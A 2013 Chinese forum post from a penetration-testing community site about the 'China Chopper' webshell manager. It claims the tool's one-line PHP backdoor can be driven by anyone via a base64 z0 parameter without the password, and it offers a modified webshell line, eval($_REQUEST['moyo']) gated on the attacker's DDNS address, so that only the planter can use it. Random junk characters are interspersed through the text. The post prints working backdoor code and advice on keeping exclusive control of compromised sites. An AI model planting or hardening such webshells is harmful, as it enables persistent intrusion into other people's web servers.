中国网络渗透测试联盟

标题: 中国菜刀 maicaidao 网站管理软件 0day [打印本页]
作者: admin    时间: 2013-7-26 12:45
标题: 中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞- {  b( a' Z9 G* r# D) F* i
! T- C: N, n$ ]! G
就算你设置了密码,使用了eval($_REQUEST['moyo']);: x: q+ i* _0 e# F7 m

' y' X. r( v3 D但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
' y5 b; J2 p5 G' Y8 K# T8 n/ d; s2 M  ?4 d; T. a" H5 v6 c- s" b5 [2 o
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));* f6 w6 k8 V6 J4 T2 M, l; i+ m" x

" h) V" U+ H/ L* [7 W直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
  p& r" |8 J, `- @" v- P
! k# c+ i  H  D& k& ]不知道是设计缺陷还是故意留的后门
  `% n- o+ X/ |( H
5 ~3 ?; L- V$ \如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用0 p6 j% ~0 a& u) H! ~/ A
( E  c/ J- L: X0 }7 x, _
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
* E! B0 x) u' V9 m8 ^( i
: ~: g! u) V2 d1 a+ q$ m( h! ]然后一句话后门这样写0 X5 C8 `) v4 Y3 h! _- a( N/ u, p4 O
- M6 J. C2 Q; V1 S5 g  ?" E
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>! ]  I6 ]* c/ j9 W% W. _0 ]8 r
这样就可以让一句话后门只允许自己的电脑连接了9 d+ w- i0 X* D
1 }) B( p# s. d& O9 n7 x; ^




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2